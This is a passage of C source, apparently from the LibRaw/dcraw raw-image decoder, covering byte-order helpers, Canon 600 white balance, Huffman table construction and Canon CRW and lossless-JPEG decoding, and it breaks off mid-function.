static uchar SonySubstitution[257] = "\x00\x01\x32\xb1\x0a\x0e\x87\x28\x02\xcc\xca\xad\x1b\xdc\x08\xed\x64\x86\xf0\x4f\x8c\x6c\xb8\xcb\x69\xc4\x2c\x03\x97\xb6\x93\x7c\x14\xf3\xe2\x3e\x30\x8e\xd7\x60\x1c\xa1\xab\x37\xec\x75\xbe\x23\x15\x6a\x59\x3f\xd0\xb9\x96\xb5\x50\x27\x88\xe3\x81\x94\xe0\xc0\x04\x5c\xc6\xe8\x5f\x4b\x70\x38\x9f\x82\x80\x51\x2b\xc5\x45\x49\x9b\x21\x52\x53\x54\x85\x0b\x5d\x61\xda\x7b\x55\x26\x24\x07\x6e\x36\x5b\x47\xb7\xd9\x4a\xa2\xdf\xbf\x12\x25\xbc\x1e\x7f\x56\xea\x10\xe6\xcf\x67\x4d\x3c\x91\x83\xe1\x31\xb3\x6f\xf4\x05\x8a\x46\xc8\x18\x76\x68\xbd\xac\x92\x2a\x13\xe9\x0f\xa3\x7a\xdb\x3d\xd4\xe7\x3a\x1a\x57\xaf\x20\x42\xb2\x9e\xc3\x8b\xf2\xd5\xd3\xa4\x7e\x1f\x98\x9c\xee\x74\xa5\xa6\xa7\xd8\x5e\xb0\xb4\x34\xce\xa8\x79\x77\x5a\xc1\x89\xae\x9a\x11\x33\x9d\xf5\x39\x19\x65\x78\x16\x71\xd2\xa9\x44\x63\x40\x29\xba\xa0\x8f\xe4\xd6\x3b\x84\x0d\xc2\x4e\x58\xdd\x99\x22\x6b\xc9\xbb\x17\x06\xe5\x7d\x66\x43\x62\xf6\xcd\x35\x90\x2e\x41\x8d\x6d\xaa\x09\x73\x95\x0c\xf1\x1d\xde\x4c\x2f\x2d\xf7\xd1\x72\xeb\xef\x48\xc7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff";
ushort CLASS sget2Rev(uchar *s) // specific to some Canon Makernotes fields, where they have endian in reverse
{
if (order == 0x4d4d) /* "II" means little-endian, and we reverse to "MM" - big endian */
return s[0] | s[1] << 8;
else /* "MM" means big-endian... */
return s[0] << 8 | s[1];
}
#endif
ushort CLASS get2()
{
uchar str[2] = { 0xff,0xff };
fread (str, 1, 2, ifp);
return sget2(str);
}
unsigned CLASS sget4 (uchar *s)
{
if (order == 0x4949)
return s[0] | s[1] << 8 | s[2] << 16 | s[3] << 24;
else
return s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3];
}
#define sget4(s) sget4((uchar *)s)
unsigned CLASS get4()
{
uchar str[4] = { 0xff,0xff,0xff,0xff };
fread (str, 1, 4, ifp);
return sget4(str);
}
unsigned CLASS getint (int type)
{
return type == 3 ? get2() : get4();
}
float CLASS int_to_float (int i)
{
union { int i; float f; } u;
u.i = i;
return u.f;
}
double CLASS getreal (int type)
{
union { char c[8]; double d; } u,v;
int i, rev;
switch (type) {
case 3: return (unsigned short) get2();
case 4: return (unsigned int) get4();
case 5:
u.d = (unsigned int) get4();
v.d = (unsigned int)get4();
return u.d / (v.d ? v.d : 1);
case 8: return (signed short) get2();
case 9: return (signed int) get4();
case 10:
u.d = (signed int) get4();
v.d = (signed int)get4();
return u.d / (v.d?v.d:1);
case 11: return int_to_float (get4());
case 12:
rev = 7 * ((order == 0x4949) == (ntohs(0x1234) == 0x1234));
for (i=0; i < 8; i++)
u.c[i ^ rev] = fgetc(ifp);
return u.d;
default: return fgetc(ifp);
}
}
void CLASS read_shorts (ushort *pixel, unsigned count)
{
if (fread (pixel, 2, count, ifp) < count) derror();
if ((order == 0x4949) == (ntohs(0x1234) == 0x1234))
swab ((char*)pixel, (char*)pixel, count*2);
}
void CLASS cubic_spline (const int *x_, const int *y_, const int len)
{
float **A, *b, *c, *d, *x, *y;
int i, j;
A = (float **) calloc (((2*len + 4)*sizeof **A + sizeof *A), 2*len);
if (!A) return;
A[0] = (float *) (A + 2*len);
for (i = 1; i < 2*len; i++)
A[i] = A[0] + 2*len*i;
y = len + (x = i + (d = i + (c = i + (b = A[0] + i*i))));
for (i = 0; i < len; i++) {
x[i] = x_[i] / 65535.0;
y[i] = y_[i] / 65535.0;
}
for (i = len-1; i > 0; i--) {
b[i] = (y[i] - y[i-1]) / (x[i] - x[i-1]);
d[i-1] = x[i] - x[i-1];
}
for (i = 1; i < len-1; i++) {
A[i][i] = 2 * (d[i-1] + d[i]);
if (i > 1) {
A[i][i-1] = d[i-1];
A[i-1][i] = d[i-1];
}
A[i][len-1] = 6 * (b[i+1] - b[i]);
}
for(i = 1; i < len-2; i++) {
float v = A[i+1][i] / A[i][i];
for(j = 1; j <= len-1; j++)
A[i+1][j] -= v * A[i][j];
}
for(i = len-2; i > 0; i--) {
float acc = 0;
for(j = i; j <= len-2; j++)
acc += A[i][j]*c[j];
c[i] = (A[i][len-1] - acc) / A[i][i];
}
for (i = 0; i < 0x10000; i++) {
float x_out = (float)(i / 65535.0);
float y_out = 0;
for (j = 0; j < len-1; j++) {
if (x[j] <= x_out && x_out <= x[j+1]) {
float v = x_out - x[j];
y_out = y[j] +
((y[j+1] - y[j]) / d[j] - (2 * d[j] * c[j] + c[j+1] * d[j])/6) * v
+ (c[j] * 0.5) * v*v + ((c[j+1] - c[j]) / (6 * d[j])) * v*v*v;
}
}
curve[i] = y_out < 0.0 ? 0 : (y_out >= 1.0 ? 65535 :
(ushort)(y_out * 65535.0 + 0.5));
}
free (A);
}
void CLASS canon_600_fixed_wb (int temp)
{
static const short mul[4][5] = {
{ 667, 358,397,565,452 },
{ 731, 390,367,499,517 },
{ 1119, 396,348,448,537 },
{ 1399, 485,431,508,688 } };
int lo, hi, i;
float frac=0;
for (lo=4; --lo; )
if (*mul[lo] <= temp) break;
for (hi=0; hi < 3; hi++)
if (*mul[hi] >= temp) break;
if (lo != hi)
frac = (float) (temp - *mul[lo]) / (*mul[hi] - *mul[lo]);
for (i=1; i < 5; i++)
pre_mul[i-1] = 1 / (frac * mul[hi][i] + (1-frac) * mul[lo][i]);
}
/* Return values: 0 = white 1 = near white 2 = not white */
int CLASS canon_600_color (int ratio[2], int mar)
{
int clipped=0, target, miss;
if (flash_used) {
if (ratio[1] < -104)
{ ratio[1] = -104; clipped = 1; }
if (ratio[1] > 12)
{ ratio[1] = 12; clipped = 1; }
} else {
if (ratio[1] < -264 || ratio[1] > 461) return 2;
if (ratio[1] < -50)
{ ratio[1] = -50; clipped = 1; }
if (ratio[1] > 307)
{ ratio[1] = 307; clipped = 1; }
}
target = flash_used || ratio[1] < 197
? -38 - (398 * ratio[1] >> 10)
: -123 + (48 * ratio[1] >> 10);
if (target - mar <= ratio[0] &&
target + 20 >= ratio[0] && !clipped) return 0;
miss = target - ratio[0];
if (abs(miss) >= mar*4) return 2;
if (miss < -20) miss = -20;
if (miss > mar) miss = mar;
ratio[0] = target - miss;
return 1;
}
void CLASS canon_600_auto_wb()
{
int mar, row, col, i, j, st, count[] = { 0,0 };
int test[8], total[2][8], ratio[2][2], stat[2];
memset (&total, 0, sizeof total);
i = canon_ev + 0.5;
if (i < 10) mar = 150;
else if (i > 12) mar = 20;
else mar = 280 - 20 * i;
if (flash_used) mar = 80;
for (row=14; row < height-14; row+=4)
for (col=10; col < width; col+=2) {
for (i=0; i < 8; i++)
test[(i & 4) + FC(row+(i >> 1),col+(i & 1))] =
BAYER(row+(i >> 1),col+(i & 1));
for (i=0; i < 8; i++)
if (test[i] < 150 || test[i] > 1500) goto next;
for (i=0; i < 4; i++)
if (abs(test[i] - test[i+4]) > 50) goto next;
for (i=0; i < 2; i++) {
for (j=0; j < 4; j+=2)
ratio[i][j >> 1] = ((test[i*4+j+1]-test[i*4+j]) << 10) / test[i*4+j];
stat[i] = canon_600_color (ratio[i], mar);
}
if ((st = stat[0] | stat[1]) > 1) goto next;
for (i=0; i < 2; i++)
if (stat[i])
for (j=0; j < 2; j++)
test[i*4+j*2+1] = test[i*4+j*2] * (0x400 + ratio[i][j]) >> 10;
for (i=0; i < 8; i++)
total[st][i] += test[i];
count[st]++;
next: ;
}
if (count[0] | count[1]) {
st = count[0]*200 < count[1];
for (i=0; i < 4; i++)
pre_mul[i] = 1.0 / (total[st][i] + total[st][i+4]);
}
}
void CLASS canon_600_coeff()
{
static const short table[6][12] = {
{ -190,702,-1878,2390, 1861,-1349,905,-393, -432,944,2617,-2105 },
{ -1203,1715,-1136,1648, 1388,-876,267,245, -1641,2153,3921,-3409 },
{ -615,1127,-1563,2075, 1437,-925,509,3, -756,1268,2519,-2007 },
{ -190,702,-1886,2398, 2153,-1641,763,-251, -452,964,3040,-2528 },
{ -190,702,-1878,2390, 1861,-1349,905,-393, -432,944,2617,-2105 },
{ -807,1319,-1785,2297, 1388,-876,769,-257, -230,742,2067,-1555 } };
int t=0, i, c;
float mc, yc;
mc = pre_mul[1] / pre_mul[2];
yc = pre_mul[3] / pre_mul[2];
if (mc > 1 && mc <= 1.28 && yc < 0.8789) t=1;
if (mc > 1.28 && mc <= 2) {
if (yc < 0.8789) t=3;
else if (yc <= 2) t=4;
}
if (flash_used) t=5;
for (raw_color = i=0; i < 3; i++)
FORCC rgb_cam[i][c] = table[t][i*4 + c] / 1024.0;
}
void CLASS canon_600_load_raw()
{
uchar data[1120], *dp;
ushort *pix;
int irow, row;
for (irow=row=0; irow < height; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (data, 1, 1120, ifp) < 1120) derror();
pix = raw_image + row*raw_width;
for (dp=data; dp < data+1120; dp+=10, pix+=8) {
pix[0] = (dp[0] << 2) + (dp[1] >> 6 );
pix[1] = (dp[2] << 2) + (dp[1] >> 4 & 3);
pix[2] = (dp[3] << 2) + (dp[1] >> 2 & 3);
pix[3] = (dp[4] << 2) + (dp[1] & 3);
pix[4] = (dp[5] << 2) + (dp[9] & 3);
pix[5] = (dp[6] << 2) + (dp[9] >> 2 & 3);
pix[6] = (dp[7] << 2) + (dp[9] >> 4 & 3);
pix[7] = (dp[8] << 2) + (dp[9] >> 6 );
}
if ((row+=2) > height) row = 1;
}
}
void CLASS canon_600_correct()
{
int row, col, val;
static const short mul[4][2] =
{ { 1141,1145 }, { 1128,1109 }, { 1178,1149 }, { 1128,1109 } };
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++) {
if ((val = BAYER(row,col) - black) < 0) val = 0;
val = val * mul[row & 3][col & 1] >> 9;
BAYER(row,col) = val;
}
}
canon_600_fixed_wb(1311);
canon_600_auto_wb();
canon_600_coeff();
maximum = (0x3ff - black) * 1109 >> 9;
black = 0;
}
int CLASS canon_s2is()
{
unsigned row;
for (row=0; row < 100; row++) {
fseek (ifp, row*3340 + 3284, SEEK_SET);
if (getc(ifp) > 15) return 1;
}
return 0;
}
unsigned CLASS getbithuff (int nbits, ushort *huff)
{
#ifdef LIBRAW_NOTHREADS
static unsigned bitbuf=0;
static int vbits=0, reset=0;
#else
#define bitbuf tls->getbits.bitbuf
#define vbits tls->getbits.vbits
#define reset tls->getbits.reset
#endif
unsigned c;
if (nbits > 25) return 0;
if (nbits < 0)
return bitbuf = vbits = reset = 0;
if (nbits == 0 || vbits < 0) return 0;
while (!reset && vbits < nbits && (c = fgetc(ifp)) != EOF &&
!(reset = zero_after_ff && c == 0xff && fgetc(ifp))) {
bitbuf = (bitbuf << 8) + (uchar) c;
vbits += 8;
}
c = bitbuf << (32-vbits) >> (32-nbits);
if (huff) {
vbits -= huff[c] >> 8;
c = (uchar) huff[c];
} else
vbits -= nbits;
if (vbits < 0) derror();
return c;
#ifndef LIBRAW_NOTHREADS
#undef bitbuf
#undef vbits
#undef reset
#endif
}
#define getbits(n) getbithuff(n,0)
#define gethuff(h) getbithuff(*h,h+1)
/*
Construct a decode tree according the specification in *source.
The first 16 bytes specify how many codes should be 1-bit, 2-bit
3-bit, etc. Bytes after that are the leaf values.
For example, if the source is
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0,
0x04,0x03,0x05,0x06,0x02,0x07,0x01,0x08,0x09,0x00,0x0a,0x0b,0xff },
then the code is
00 0x04
010 0x03
011 0x05
100 0x06
101 0x02
1100 0x07
1101 0x01
11100 0x08
11101 0x09
11110 0x00
111110 0x0a
1111110 0x0b
1111111 0xff
*/
ushort * CLASS make_decoder_ref (const uchar **source)
{
int max, len, h, i, j;
const uchar *count;
ushort *huff;
count = (*source += 16) - 17;
for (max=16; max && !count[max]; max--);
huff = (ushort *) calloc (1 + (1 << max), sizeof *huff);
merror (huff, "make_decoder()");
huff[0] = max;
for (h=len=1; len <= max; len++)
for (i=0; i < count[len]; i++, ++*source)
for (j=0; j < 1 << (max-len); j++)
if (h <= 1 << max)
huff[h++] = len << 8 | **source;
return huff;
}
ushort * CLASS make_decoder (const uchar *source)
{
return make_decoder_ref (&source);
}
void CLASS crw_init_tables (unsigned table, ushort *huff[2])
{
static const uchar first_tree[3][29] = {
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0,
0x04,0x03,0x05,0x06,0x02,0x07,0x01,0x08,0x09,0x00,0x0a,0x0b,0xff },
{ 0,2,2,3,1,1,1,1,2,0,0,0,0,0,0,0,
0x03,0x02,0x04,0x01,0x05,0x00,0x06,0x07,0x09,0x08,0x0a,0x0b,0xff },
{ 0,0,6,3,1,1,2,0,0,0,0,0,0,0,0,0,
0x06,0x05,0x07,0x04,0x08,0x03,0x09,0x02,0x00,0x0a,0x01,0x0b,0xff },
};
static const uchar second_tree[3][180] = {
{ 0,2,2,2,1,4,2,1,2,5,1,1,0,0,0,139,
0x03,0x04,0x02,0x05,0x01,0x06,0x07,0x08,
0x12,0x13,0x11,0x14,0x09,0x15,0x22,0x00,0x21,0x16,0x0a,0xf0,
0x23,0x17,0x24,0x31,0x32,0x18,0x19,0x33,0x25,0x41,0x34,0x42,
0x35,0x51,0x36,0x37,0x38,0x29,0x79,0x26,0x1a,0x39,0x56,0x57,
0x28,0x27,0x52,0x55,0x58,0x43,0x76,0x59,0x77,0x54,0x61,0xf9,
0x71,0x78,0x75,0x96,0x97,0x49,0xb7,0x53,0xd7,0x74,0xb6,0x98,
0x47,0x48,0x95,0x69,0x99,0x91,0xfa,0xb8,0x68,0xb5,0xb9,0xd6,
0xf7,0xd8,0x67,0x46,0x45,0x94,0x89,0xf8,0x81,0xd5,0xf6,0xb4,
0x88,0xb1,0x2a,0x44,0x72,0xd9,0x87,0x66,0xd4,0xf5,0x3a,0xa7,
0x73,0xa9,0xa8,0x86,0x62,0xc7,0x65,0xc8,0xc9,0xa1,0xf4,0xd1,
0xe9,0x5a,0x92,0x85,0xa6,0xe7,0x93,0xe8,0xc1,0xc6,0x7a,0x64,
0xe1,0x4a,0x6a,0xe6,0xb3,0xf1,0xd3,0xa5,0x8a,0xb2,0x9a,0xba,
0x84,0xa4,0x63,0xe5,0xc5,0xf3,0xd2,0xc4,0x82,0xaa,0xda,0xe4,
0xf2,0xca,0x83,0xa3,0xa2,0xc3,0xea,0xc2,0xe2,0xe3,0xff,0xff },
{ 0,2,2,1,4,1,4,1,3,3,1,0,0,0,0,140,
0x02,0x03,0x01,0x04,0x05,0x12,0x11,0x06,
0x13,0x07,0x08,0x14,0x22,0x09,0x21,0x00,0x23,0x15,0x31,0x32,
0x0a,0x16,0xf0,0x24,0x33,0x41,0x42,0x19,0x17,0x25,0x18,0x51,
0x34,0x43,0x52,0x29,0x35,0x61,0x39,0x71,0x62,0x36,0x53,0x26,
0x38,0x1a,0x37,0x81,0x27,0x91,0x79,0x55,0x45,0x28,0x72,0x59,
0xa1,0xb1,0x44,0x69,0x54,0x58,0xd1,0xfa,0x57,0xe1,0xf1,0xb9,
0x49,0x47,0x63,0x6a,0xf9,0x56,0x46,0xa8,0x2a,0x4a,0x78,0x99,
0x3a,0x75,0x74,0x86,0x65,0xc1,0x76,0xb6,0x96,0xd6,0x89,0x85,
0xc9,0xf5,0x95,0xb4,0xc7,0xf7,0x8a,0x97,0xb8,0x73,0xb7,0xd8,
0xd9,0x87,0xa7,0x7a,0x48,0x82,0x84,0xea,0xf4,0xa6,0xc5,0x5a,
0x94,0xa4,0xc6,0x92,0xc3,0x68,0xb5,0xc8,0xe4,0xe5,0xe6,0xe9,
0xa2,0xa3,0xe3,0xc2,0x66,0x67,0x93,0xaa,0xd4,0xd5,0xe7,0xf8,
0x88,0x9a,0xd7,0x77,0xc4,0x64,0xe2,0x98,0xa5,0xca,0xda,0xe8,
0xf3,0xf6,0xa9,0xb2,0xb3,0xf2,0xd2,0x83,0xba,0xd3,0xff,0xff },
{ 0,0,6,2,1,3,3,2,5,1,2,2,8,10,0,117,
0x04,0x05,0x03,0x06,0x02,0x07,0x01,0x08,
0x09,0x12,0x13,0x14,0x11,0x15,0x0a,0x16,0x17,0xf0,0x00,0x22,
0x21,0x18,0x23,0x19,0x24,0x32,0x31,0x25,0x33,0x38,0x37,0x34,
0x35,0x36,0x39,0x79,0x57,0x58,0x59,0x28,0x56,0x78,0x27,0x41,
0x29,0x77,0x26,0x42,0x76,0x99,0x1a,0x55,0x98,0x97,0xf9,0x48,
0x54,0x96,0x89,0x47,0xb7,0x49,0xfa,0x75,0x68,0xb6,0x67,0x69,
0xb9,0xb8,0xd8,0x52,0xd7,0x88,0xb5,0x74,0x51,0x46,0xd9,0xf8,
0x3a,0xd6,0x87,0x45,0x7a,0x95,0xd5,0xf6,0x86,0xb4,0xa9,0x94,
0x53,0x2a,0xa8,0x43,0xf5,0xf7,0xd4,0x66,0xa7,0x5a,0x44,0x8a,
0xc9,0xe8,0xc8,0xe7,0x9a,0x6a,0x73,0x4a,0x61,0xc7,0xf4,0xc6,
0x65,0xe9,0x72,0xe6,0x71,0x91,0x93,0xa6,0xda,0x92,0x85,0x62,
0xf3,0xc5,0xb2,0xa4,0x84,0xba,0x64,0xa5,0xb3,0xd2,0x81,0xe5,
0xd3,0xaa,0xc4,0xca,0xf2,0xb1,0xe4,0xd1,0x83,0x63,0xea,0xc3,
0xe2,0x82,0xf1,0xa3,0xc2,0xa1,0xc1,0xe3,0xa2,0xe1,0xff,0xff }
};
if (table > 2) table = 2;
huff[0] = make_decoder ( first_tree[table]);
huff[1] = make_decoder (second_tree[table]);
}
/*
Return 0 if the image starts with compressed data,
1 if it starts with uncompressed low-order bits.
In Canon compressed data, 0xff is always followed by 0x00.
*/
int CLASS canon_has_lowbits()
{
uchar test[0x4000];
int ret=1, i;
fseek (ifp, 0, SEEK_SET);
fread (test, 1, sizeof test, ifp);
for (i=540; i < sizeof test - 1; i++)
if (test[i] == 0xff) {
if (test[i+1]) return 1;
ret=0;
}
return ret;
}
void CLASS canon_load_raw()
{
ushort *pixel, *prow, *huff[2];
int nblocks, lowbits, i, c, row, r, save, val;
int block, diffbuf[64], leaf, len, diff, carry=0, pnum=0, base[2];
crw_init_tables (tiff_compress, huff);
lowbits = canon_has_lowbits();
if (!lowbits) maximum = 0x3ff;
fseek (ifp, 540 + lowbits*raw_height*raw_width/4, SEEK_SET);
zero_after_ff = 1;
getbits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row+=8) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pixel = raw_image + row*raw_width;
nblocks = MIN (8, raw_height-row) * raw_width >> 6;
for (block=0; block < nblocks; block++) {
memset (diffbuf, 0, sizeof diffbuf);
for (i=0; i < 64; i++ ) {
leaf = gethuff(huff[i > 0]);
if (leaf == 0 && i) break;
if (leaf == 0xff) continue;
i += leaf >> 4;
len = leaf & 15;
if (len == 0) continue;
diff = getbits(len);
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
if (i < 64) diffbuf[i] = diff;
}
diffbuf[0] += carry;
carry = diffbuf[0];
for (i=0; i < 64; i++ ) {
if (pnum++ % raw_width == 0)
base[0] = base[1] = 512;
if ((pixel[(block << 6) + i] = base[i & 1] += diffbuf[i]) >> 10)
derror();
}
}
if (lowbits) {
save = ftell(ifp);
fseek (ifp, 26 + row*raw_width/4, SEEK_SET);
for (prow=pixel, i=0; i < raw_width*2; i++) {
c = fgetc(ifp);
for (r=0; r < 8; r+=2, prow++) {
val = (*prow << 2) + ((c >> r) & 3);
if (raw_width == 2672 && val < 512) val += 2;
*prow = val;
}
}
fseek (ifp, save, SEEK_SET);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
FORC(2) free (huff[c]);
throw;
}
#endif
FORC(2) free (huff[c]);
}
//@end COMMON
struct jhead {
int algo, bits, high, wide, clrs, sraw, psv, restart, vpred[6];
ushort quant[64], idct[64], *huff[20], *free[20], *row;
};
//@out COMMON
int CLASS ljpeg_start (struct jhead *jh, int info_only)
{
ushort c, tag, len;
int cnt = 0;
uchar data[0x10000];
const uchar *dp;
memset (jh, 0, sizeof *jh);
jh->restart = INT_MAX;
if ((fgetc(ifp),fgetc(ifp)) != 0xd8) return 0;
do {
if(feof(ifp)) return 0;
if(cnt++ > 1024) return 0; // 1024 tags limit
if (!fread (data, 2, 2, ifp)) return 0;
tag = data[0] << 8 | data[1];
len = (data[2] << 8 | data[3]) - 2;
if (tag <= 0xff00) return 0;
fread (data, 1, len, ifp);
switch (tag) {
case 0xffc3: // start of frame; lossless, Huffman
jh->sraw = ((data[7] >> 4) * (data[7] & 15) - 1) & 3;
case 0xffc1:
case 0xffc0:
jh->algo = tag & 0xff;
jh->bits = data[0];
jh->high = data[1] << 8 | data[2];
jh->wide = data[3] << 8 | data[4];
jh->clrs = data[5] + jh->sraw;
if (len == 9 && !dng_version) getc(ifp);
break;
case 0xffc4: // define Huffman tables
if (info_only) break;
for (dp = data; dp < data+len && !((c = *dp++) & -20); )
jh->free[c] = jh->huff[c] = make_decoder_ref (&dp);
break;
case 0xffda: // start of scan
jh->psv = data[1+data[0]*2];
jh->bits -= data[3+data[0]*2] & 15;
break;
case 0xffdb:
FORC(64) jh->quant[c] = data[c*2+1] << 8 | data[c*2+2];
break;
case 0xffdd:
jh->restart = data[0] << 8 | data[1];
}
} while (tag != 0xffda);
if (jh->bits > 16 || jh->clrs > 6 ||
!jh->bits || !jh->high || !jh->wide || !jh->clrs) return 0;
if (info_only) return 1;
if (!jh->huff[0]) return 0;
FORC(19) if (!jh->huff[c+1]) jh->huff[c+1] = jh->huff[c];
if (jh->sraw) {
FORC(4) jh->huff[2+c] = jh->huff[1];
FORC(jh->sraw) jh->huff[1+c] = jh->huff[0];
}
jh->row = (ushort *) calloc (jh->wide*jh->clrs, 4);
merror (jh->row, "ljpeg_start()");
return zero_after_ff = 1;
}
void CLASS ljpeg_end (struct jhead *jh)
{
int c;
FORC4 if (jh->free[c]) free (jh->free[c]);
free (jh->row);
}
int CLASS ljpeg_diff (ushort *huff)
{
int len, diff;
if(!huff)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 2);
#endif
len = gethuff(huff);
if (len == 16 && (!dng_version || dng_version >= 0x1010000))
return -32768;
diff = getbits(len);
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
return diff;
}
ushort * CLASS ljpeg_row (int jrow, struct jhead *jh)
{
int col, c, diff, pred, spred=0;
ushort mark=0, *row[3];
if (jrow * jh->wide % jh->restart == 0) {
FORC(6) jh->vpred[c] = 1 << (jh->bits-1);
if (jrow) {
fseek (ifp, -2, SEEK_CUR);
do mark = (mark << 8) + (c = fgetc(ifp));
while (c != EOF && mark >> 4 != 0xffd);
}
getbits(-1);
}
FORC3 row[c] = jh->row + jh->wide*jh->clrs*((jrow+c) & 1);
for (col=0; col < jh->wide; col++)
FORC(jh->clrs) {
diff = ljpeg_diff (jh->huff[c]);
if (jh->sraw && c <= jh->sraw && (col | c))
pred = spred;
else if (col) pred = row[0][-jh->clrs];
else pred = (jh->vpred[c] += diff) - diff;
if (jrow && col) switch (jh->psv) {
case 1: break;
case 2: pred = row[1][0]; break;
case 3: pred = row[1][-jh->clrs]; break;
case 4: pred = pred + row[1][0] - row[1][-jh->clrs]; break;
case 5: pred = pred + ((row[1][0] - row[1][-jh->clrs]) >> 1); break;
case 6: pred = row[1][0] + ((pred - row[1][-jh->clrs]) >> 1); break;
case 7: pred = (pred + row[1][0]) >> 1; break;
default: pred = 0;
}
if ((**row = pred + diff) >> jh->bits) derror();
if (c <= jh->sraw) spred = **row;
row[0]++; row[1]++;
}
return row[2];
}
void CLASS lossless_jpeg_load_raw()
{
int jwide, jhigh, jrow, jcol, val, jidx, i, j, row=0, col=0;
struct jhead jh;
ushort *rp;
if (!ljpeg_start (&jh, 0)) return;
if(jh.wide<1 || jh.high<1 || jh.clrs<1 || jh.bits <1)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 2);
#endif
jwide = jh.wide * jh.clrs;
jhigh = jh.high;
if(jh.clrs == 4 && jwide >= raw_width*2) jhigh *= 2;
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (jrow=0; jrow < jh.high; jrow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
rp = ljpeg_row (jrow, &jh);
if (load_flags & 1)
row = jrow & 1 ? height-1-jrow/2 : jrow/2;
for (jcol=0; jcol < jwide; jcol++) {
val = curve[*rp++];
if (cr2_slice[0]) {
jidx = jrow*jwide + jcol;
i = jidx / (cr2_slice[1]*raw_height);
if ((j = i >= cr2_slice[0]))
i = cr2_slice[0];
jidx -= i * (cr2_slice[1]*raw_height);
row = jidx / cr2_slice[1+j];
col = jidx % cr2_slice[1+j] + i*cr2_slice[1];
}
if (raw_width == 3984 && (col -= 2) < 0)
col += (row--,raw_width);
if(row>raw_height)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 3);
#endif
if ((unsigned) row < raw_height) RAW(row,col) = val;
if (++col >= raw_width)
col = (row++,0);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw;
}
#endif
ljpeg_end (&jh);
}
void CLASS canon_sraw_load_raw()
{
struct jhead jh;
short *rp=0, (*ip)[4];
int jwide, slice, scol, ecol, row, col, jrow=0, jcol=0, pix[3], c;
int v[3]={0,0,0}, ver, hue;
#ifdef LIBRAW_LIBRARY_BUILD
int saved_w = width, saved_h = height;
#endif
char *cp;
if (!ljpeg_start (&jh, 0) || jh.clrs < 4) return;
jwide = (jh.wide >>= 1) * jh.clrs;
#ifdef LIBRAW_LIBRARY_BUILD
if(load_flags & 256)
{
width = raw_width;
height = raw_height;
}
try {
#endif
for (ecol=slice=0; slice <= cr2_slice[0]; slice++) {
scol = ecol;
ecol += cr2_slice[1] * 2 / jh.clrs;
if (!cr2_slice[0] || ecol > raw_width-1) ecol = raw_width & -2;
for (row=0; row < height; row += (jh.clrs >> 1) - 1) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
ip = (short (*)[4]) image + row*width;
for (col=scol; col < ecol; col+=2, jcol+=jh.clrs) {
if ((jcol %= jwide) == 0)
rp = (short *) ljpeg_row (jrow++, &jh);
if (col >= width) continue;
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_INTERPOLATE)
{
FORC (jh.clrs-2)
{
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col + (c >> 1)*width + (c & 1)][1] = ip[col + (c >> 1)*width + (c & 1)][2] = 8192;
}
ip[col][1] = rp[jcol+jh.clrs-2] - 8192;
ip[col][2] = rp[jcol+jh.clrs-1] - 8192;
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_RGB)
{
FORC (jh.clrs-2)
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col][1] = rp[jcol+jh.clrs-2] - 8192;
ip[col][2] = rp[jcol+jh.clrs-1] - 8192;
}
else
#endif
{
FORC (jh.clrs-2)
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col][1] = rp[jcol+jh.clrs-2] - 16384;
ip[col][2] = rp[jcol+jh.clrs-1] - 16384;
}
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_INTERPOLATE)
{
ljpeg_end (&jh);
maximum = 0x3fff;
height = saved_h;
width = saved_w;
return;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (cp=model2; *cp && !isdigit(*cp); cp++);
sscanf (cp, "%d.%d.%d", v, v+1, v+2);
ver = (v[0]*1000 + v[1])*1000 + v[2];
hue = (jh.sraw+1) << 2;
if (unique_id >= 0x80000281 || (unique_id == 0x80000218 && ver > 1000006))
hue = jh.sraw << 1;
ip = (short (*)[4]) image;
rp = ip[0];
for (row=0; row < height; row++, ip+=width) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (row & (jh.sraw >> 1))
{
for (col=0; col < width; col+=2)
for (c=1; c < 3; c++)
if (row == height-1)
{
ip[col][c] = ip[col-width][c];
}
else
{
ip[col][c] = (ip[col-width][c] + ip[col+width][c] + 1) >> 1;
}
}
for (col=1; col < width; col+=2)
for (c=1; c < 3; c++)
if (col == width-1)
ip[col][c] = ip[col-1][c];
else ip[col][c] = (ip[col-1][c] + ip[col+1][c] + 1) >> 1;
}
#ifdef LIBRAW_LIBRARY_BUILD
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_RGB) )
#endif
for ( ; rp < ip[0]; rp+=4) {
